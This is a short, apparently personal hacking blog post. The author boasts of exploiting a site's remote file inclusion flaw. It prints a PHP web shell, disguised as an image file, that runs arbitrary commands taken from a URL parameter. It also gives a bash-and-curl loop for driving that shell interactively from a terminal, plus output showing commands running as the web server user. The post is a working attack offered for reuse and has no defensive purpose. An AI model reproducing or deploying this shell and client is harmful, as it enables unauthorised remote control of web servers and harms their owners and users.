I know, there are several php-shells out there, but i like to build all by my own, thats the scope and the fun part.
So yesterday, exploiting some site with a RFI vuln, i reused my favorite "shell over http" variant ;)
here the php code to upload:
$ cat Hacking/image.php.jpg < ?php if($_GET[cmd] != "") { if ($_GET[plain] != "") { echo shell_exec($_GET[cmd]); } else { echo "".shell_exec($_GET[cmd]).""; } } ?> $
So we can use it with no "plain" argument from the browser, simply adding the "cmd" argument, and with "plain=1" argument from the terminal:
$ while [ 1 ]; do echo -n "$ " && read CMD && CMD2=`echo $CMD | sed -e 's/ /+/g'` && curl http://imavulnerablesite.com/vulnerable.php?parameters&plain=1&cmd=$CMD2+2%3E%261; done $ id uid=48(apache) gid=48(apache) groups=14(uucp),48(apache) $ ls -la total 136 drwxr-xr-x 7 root root 4096 Aug 30 14:49 . drwxr-xr-x 13 root root 4096 May 9 14:55 .. -rw-r--r-- 1 root root 36 Apr 3 17:43 .htaccess [...]
Happy hacking ;)